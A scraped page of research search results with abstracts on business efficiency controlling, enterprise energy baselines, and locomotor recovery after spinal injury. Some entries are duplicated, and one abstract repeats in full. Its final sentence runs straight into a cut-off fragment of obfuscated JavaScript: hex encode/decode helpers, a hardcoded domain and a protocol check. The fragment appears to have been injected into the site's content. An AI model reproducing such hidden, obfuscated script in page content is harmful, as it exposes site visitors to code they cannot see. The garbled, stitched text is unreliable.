5 research outputs found

    Content of the scope of the companies' business efficiency controlling

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    The peculiarities of the current economic conditions associated with significant sophistication and extension of linkages between individual systems and elements of the companies require the managers to improve the business parameters’ monitoring procedures

    Content of the scope of the companies' business efficiency controlling

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    The peculiarities of the current economic conditions associated with significant sophistication and extension of linkages between individual systems and elements of the companies require the managers to improve the business parameters’ monitoring procedures

    Creating a Methodology for Determination of the Energy Baseline of an Enterprise

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    The aim of this paper is to provide a general methodology for determination of an energy baseline of an enterprise. It is important goal because nowadays all the industrial enterprises have their own criteria’s of energy efficiency andenergy performance indicators, which make impossible comparison and benchmarking of these ones. At the same time simple specific energy consumption related to a volume of production can not serve as a good indicator. So, at the first hand. This paper contains definitions for the energy efficiency of the enterprise and its energy performance indicators as characterizationof the energy efficiency in industrial processes, determined by comparing the values of the specific energy efficiency of these processes with similar indicators selected as a reference. Also it determinates indicators that affect the use of energy (e.g. weather conditions, feedstock characteristics like water content, etc.). Paper reveals the essence of the energy baseline as the dependence of energy consumption at the same value of energy plant (technology, process) from external factors in a changing environment and describes how to assign the technological and infrastructural component in energy use in aggregatesand technological lines of the enterprise. Baseline could be presented in a form of a table or a chart depending on needs. Created energy baseline of the enterprise result in possibility to compare and benchmark the effectiveness of the different enterprises (aggregates, production lines), or effectiveness of the same enterprise (aggregates, production lines) in a different periods.The aim of this paper is to provide a general methodology for determination of an energy baseline of an enterprise. It is important goal because nowadays all the industrial enterprises have their own criteria’s of energy efficiency and energy performance indicators, which make impossible comparison and benchmarking of these ones. At the same time simple specific energy consumption related to a volume of production can not serve as a good indicator. So, at the first hand. This paper contains definitions for the energy efficiency of the enterprise and its energy performance indicators as characterization of the energy efficiency in industrial processes, determined by comparing the values of the specific energy efficiency of these processes with similar indicators selected as a reference. Also it determinates indicators that affect the use of energy (e.g. weather conditions, feedstock characteristics like water content, etc.). Paper reveals the essence of the energy baseline as the dependence of energy consumption at the same value of energy plant (technology, process) from external factors in a changing environment and describes how to assign the technological and infrastructural component in energy use in aggregates and technological lines of the enterprise. Baseline could be presented in a form of a table or a chart depending on needs. Created energy baseline of the enterprise result in possibility to compare and benchmark the effectiveness of the different enterprises (aggregates, production lines), or effectiveness of the same enterprise (aggregates, production lines) in a different periods.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "etpo.khpi.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;

    Plasticity of connections underlying locomotor recovery after central and/or peripheral lesions in the adult mammals

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    This review discusses some aspects of plasticity of connections after spinal injury in adult animal models as a basis for functional recovery of locomotion. After reviewing some pitfalls that must be avoided when claiming functional recovery and the importance of a conceptual framework for the control of locomotion, locomotor recovery after spinal lesions, mainly in cats, is summarized. It is concluded that recovery is partly due to plastic changes within the existing spinal locomotor networks. Locomotor training appears to change the excitability of simple reflex pathways as well as more complex circuitry. The spinal cord possesses an intrinsic capacity to adapt to lesions of central tracts or peripheral nerves but, as a rule, adaptation to lesions entails changes at both spinal and supraspinal levels. A brief summary of the spinal capacity of the rat, mouse and human to express spinal locomotor patterns is given, indicating that the concepts derived mainly from work in the cat extend to other adult mammals. It is hoped that some of the issues presented will help to evaluate how plasticity of existing connections may combine with and potentiate treatments designed to promote regeneration to optimize remaining motor functions